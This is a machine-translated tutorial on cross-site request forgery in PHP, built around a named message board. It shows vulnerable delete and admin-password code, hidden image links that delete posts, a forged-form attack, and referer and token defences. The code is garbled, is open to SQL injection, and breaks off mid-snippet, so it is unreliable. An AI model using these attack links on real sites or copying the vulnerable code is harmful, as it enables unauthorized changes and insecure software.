PHP vulnerability resolution (6)-Cross-Site Request Forgery

This article describes cross-site request forgery for PHP websites. In all CSRF attacks, attackers may forge an HTTP request that appears to be initiated by another user. In fact, tracking an HTTP request sent by a user is the purpose of the attacker. CSRF (Cross Site Request Forgeries) indicates Cross-Site Request forgery, or XSRF. The attacker spoofs the HTTP request of the target user and then sends the request to a website with the CSRF vulnerability. after the website executes this request, it triggers a cross-site request forgery attack. The attacker uses a concealed HTTP connection to allow the target user to click the link without looking at it. because the user clicks the link, the target user has the legal permissions, therefore, the target user can execute specific HTTP links on the website to achieve attackers.
For example, when a shopping website buys a product, it uses a http://www.shop.com/buy.php? Item = watch & num = 1. the item parameter determines the item to be purchased, and the num parameter determines the quantity to be purchased. If an attacker sends a link to the target user in a hidden manner, if the target user accidentally accesses the service, the number of purchased instances will become 1000.
Instance
Suiyuan Network PHP message board V1.0
Delete any message
// Delbook. php this page is used to delete messages
Include_once ("dlyz. php"); // The user of dlyz. php verifies the permission. The message can be deleted only when the permission is admin.
Include_once ("../conn. php ");
$ Del = $ _ GET ["del"];
$ Id = $ _ GET ["id"];
If ($ del = "data ")
{
$ ID_Dele = implode (",", $ _ POST ['adid']);
$ SQL = "delete from book where id in (". $ ID_Dele .")";
Mysql_query ($ SQL );
}
Else
{
$ SQL = "delete from book where id =". $ id; // The ID of the message to be deleted
Mysql_query ($ SQL );
}
Mysql_close ($ conn );
Echo "";
Echo "alert ('deleted successfully! ');";
Echo "location = 'Book. php ';";
Echo "";
?>
When we have the admin permission to submit http: // localhost/manage/delbook. php? When id = 2, the message with id 2 is deleted.
Usage:
We use the normal user message (source code), the content is
"Delbook. php? Id = 2 "/>
"Delbook. php? Id = 3 "/>
"Delbook. php? Id = 4 "/>
"Delbook. php? Id = 5 "/>
Insert four image links to delete the four id messages, and then return to the home page for viewing. there is no change .. The image cannot be displayed.
Now, after logging in with the administrator account, refresh the home page. one message is left, and all other messages with the ID number specified in the image link are deleted.
The attacker inserts a hidden image link in the message. This link deletes the message, and the attacker does not have the permission to access these image links, so it cannot see any effect, however, when the administrator logs on to the system, the system will view the message and execute the hidden link. the permission of the administrator is large enough to delete the message.
Change administrator password
// Pass. php
If ($ _ GET ["act"])
{
$ Username = $ _ POST ["username"];
$ Sh = $ _ POST ["sh"];
$ Gg = $ _ POST ["gg"];
$ Title = $ _ POST ["title"];
$ Copyright = $ _ POST ["copyright"]."
Design and Production: Hacker contract security net ";
$ Password = md5 ($ _ POST ["password"]);
If (emptyempty ($ _ POST ["password"])
{
$ SQL = "update ugly set username = '". $ username. "', sh = ". $ sh. ", gg = '". $ gg. "', title = '". $ title. "', copyright = '". $ copyright. "'Where id = 1 ″;
}
Else
{
$ SQL = "update ugly set username = '". $ username. "', password = '". $ password. "', sh = ". $ sh. ", gg = '". $ gg. "', title = '". $ title. "', copyright = '". $ copyright. "'Where id = 1 ″;
}
Mysql_query ($ SQL );
Mysql_close ($ conn );
Echo "";
Echo "alert ('modified successfully! ');";
Echo "location = 'pass. php ';";
Echo "";
}
This file is used to modify the management password and website settings. we can directly construct the following form:







You are welcome to install and use the PHP message board V1.0 on the Suiyuan network (with the review function )! Textarea>
Suiyuan Network PHP message book V1.0 Copyright: Xiamen Suiyuan network technology 2005-2009
Provide discount host domain name textarea for website construction and system customization>
Form>
Body>
Save it as attack.html and paste it on your website.
Defense methods
It is more difficult to prevent CSRF than to prevent other attacks, because although the HTTP request of CSRF is forged by the attacker, it is sent by the target user. Generally, there are several common preventive methods:
1. check the webpage source
2. check the built-in hidden variables.
3. use POST instead of GET
Check webpage source
Add the following red font code to the // pass. php header to verify data submission.
If ($ _ GET ["act"])
{
If (isset ($ _ SERVER ["HTTP_REFERER"])
{
$ Serverhost = $ _ SERVER ["SERVER_NAME"];
$ Strurl = str_replace ("http: //", "", $ _ SERVER ["HTTP_REFERER"]);
$ Strdomain = explode ("/", $ strurl );
$ Sourcehost = $ strdomain [0];
If (strncmp ($ sourcehost, $ serverhost, strlen ($ serverhost )))
{
Unset ($ _ POST );
Echo "";
Echo "alert ('data source exception! ');";
Echo "location = 'index. php ';";
Echo "";
}
}
$ Username = $ _ POST ["username"];
$ Sh = $ _ POST ["sh"];
$ Gg = $ _ POST ["gg"];
$ Title = $ _ POST ["title"];
$ Copyright = $ _ POST ["copyright"]."
Design and Production: Xiamen Suiyuan network technology ";
$ Password = md5 ($ _ POST ["password"]);
If (emptyempty ($ _ POST ["password"])
{
$ SQL = "update ugly set username = '". $ username. "', sh = ". $ sh. ", gg = '". $ gg. "', title = '". $ title. "', copyright = '". $ copyright. "'Where id = 1 ″;
}
Else
{
$ SQL = "update ugly set username = '". $ username. "', password = '". $ password. "', sh = ". $ sh. ", gg = '". $ gg. "', title = '". $ title. "', copyright = '". $ copyright. "'Where id = 1 ″;
}
Mysql_query ($ SQL );
Mysql_close ($ conn );
Echo "";
Echo "alert ('modified successfully! ');";
Echo "location = 'pass. php ';";
Echo "";
}
Check built-in hidden variables
We have a built-in hidden variable and a session variable in the form, and then check whether the hidden variable is equal to the session variable to determine whether the same web page calls
Php
Include_once ("dlyz. php"); include_once ("../conn. php"); if ($ _ GET ["act"]) {if (! Isset ($ _ SESSION ["post_id"]) {// generate a unique ID and use MD5 to encrypt $ post_id = md5 (uniqid (rand (), true )); // create the Session variable $ _ SESSION ["post_id"] = $ post_id;} // check whether it is equal if (isset ($ _ SESSION ["post_id"]) {// not equal if ($ _ SESSION ["post_id"]! = $ _ POST ["post_id"]) {// clear the POST variable unset ($ _ POST); echo"